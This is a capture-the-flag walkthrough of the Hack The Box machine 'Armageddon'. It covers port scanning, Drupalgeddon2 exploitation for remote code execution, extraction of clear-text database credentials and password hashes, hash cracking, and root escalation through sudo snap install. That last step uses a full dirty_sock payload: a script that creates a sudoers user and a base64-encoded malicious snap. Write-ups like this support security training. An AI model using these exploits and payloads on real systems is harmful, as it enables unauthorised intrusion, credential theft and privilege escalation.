Recon
nmap x rustscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
└─$ rustscan -a 10.10.10.233 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
Open 10.10.10.233:22
Open 10.10.10.233:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries /includes/ /misc/ /modules/ /profiles/ /scripts/ /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ _/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
|
We now know that we are targeted a CentOS Box with a Drupal system installed. Drupal is a free and open-source web content management system written in PHP.
dirbuster
The dirbuster
scan offer multiple files and directory. We found a changelog file at http://10.10.10.233/CHANGELOG.txt
that give us the version of drupal.
The box is potentially running a v7.56 Drupal.
Vulnerabilities finding
Running searchsploit
, we found multiple exploit affecting that version.
1
2
3
4
5
6
7
8
|
└─$ searchsploit drupal 7.5
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execu | php/webapps/44449.rb
-------------------------------------------------------------------------------- ---------------------------------
|
We don’t have an account so we have one exploit left: Drupalgeddon2
Oh it sound like the box name :)
1
2
3
4
|
└─$ ruby 44449.rb http://10.10.10.233
armageddon.htb>> whoami
apache
|
We have a shell! We are now connected into apache
user.
Local recon
Listing network listening connections.
1
2
3
4
5
6
|
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN
|
In the /var/www/html
directory we found a .gitignore
file. This file may contain paths to sensible files.
1
2
3
4
5
6
7
|
armageddon.htb>> cat /var/www/html/.gitignore
# Ignore configuration files that may contain sensitive information.
sites/*/settings*.php
# Ignore paths that contain user-generated content.
sites/*/files
sites/*/private
|
There is an interesting file: /var/www/html/sites/default/settings.php
. On this file we can find clear credentials for the mysql server.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
|
We can get the users
table content from the drupal
database.
1
2
3
4
5
6
|
armageddon.htb>> mysql --user=drupaluser --password='CQHEy@9M*m23gBVj' -D drupal -e 'select * from users;'
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
3 toto $S$D5e7frSb/371LEqrZhsln.qETnFr.AZEOut7MCytPZPoAoeos0Bw alt.du-9lbv0xo@yopmail.com filtered_html 1661977417 0 0 0 Europe/London 0 alt.du-9lbv0xo@yopmail.comNULL
|
We obtain two users and their password hash:
brucetherealadmin:$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
toto:$S$D5e7frSb/371LEqrZhsln.qETnFr.AZEOut7MCytPZPoAoeos0Bw
Trying to bruteforce brucy hash
1
2
3
4
5
|
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo (?)
|
We get his password booboo
. We are now able to connect to the website or in SSH with those credentials: brucetherealadmin:booboo
We can get the user flag!
1
2
|
[brucetherealadmin@armageddon ~]$ cat /home/brucetherealadmin/user.txt
*************************78ed36c
|
Path to the privesc
When listing privileges of bruce, we see that he is able to use snap install
with root right
1
2
3
4
5
6
7
8
9
10
|
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset,
env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
|
I first search on exploitdb if a privilege escalation from snap
exist.
1
2
3
4
5
6
7
8
9
10
11
|
└─$ searchsploit snapd
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) | linux/local/46362.py
--------------------------------------------------------------------- ---------------------------------
[brucetherealadmin@armageddon ~]$ snap --version
snap 2.47.1-1.el7
snapd 2.47.1-1.el7
|
The exploit does not work as it is. We will use the payload set on the script and write it as a snap file.
The payload create a user (dirty_sock), this user will be added to the sudoers group, allowing the user to use the sudo
command.
1
2
3
4
5
|
#!/bin/bash
useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock ALL=(ALL:ALL) ALL" >> /etc/sudoers
|
We can write a simple python script that will decode the base64 payload and write it into the file exploit.snap
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
SNAP = ('''
aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''
+ 'A' * 4256 + '==')
import base64
blob = base64.b64decode(SNAP)
with open("exploit.snap", "wb") as f:
f.write(blob)
f.close()
|
Then we can launch a snap install
with root privileges.
1
2
3
4
5
6
|
[brucetherealadmin@armageddon tmp]$ sudo snap install --dangerous --devmode exploit.snap
dirty-sock 0.1 installed
# checking user presence
[brucetherealadmin@armageddon tmp]$ cat /etc/passwd
dirty_sock:x:1001:1001::/home/dirty_sock:/bin/bash
|
Our new user is well created, we can now get the flag !
1
2
3
4
5
|
[brucetherealadmin@armageddon tmp]$ su dirty_sock
Mot de passe : dirty_sock
[dirty_sock@armageddon /]$ sudo cat /root/root.txt
*************************70c28a3
|
PHP, Password Reuse, Easy, External, Drupal, Penetration Tester Level 1, CVE Exploitation, CVE-2018-7600, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Weak Credentials, A07:2021-Identification And Authentication Failures, Source Code Review, Clear Text Credentials, Authentication, Password Cracking, Sudo Exploitation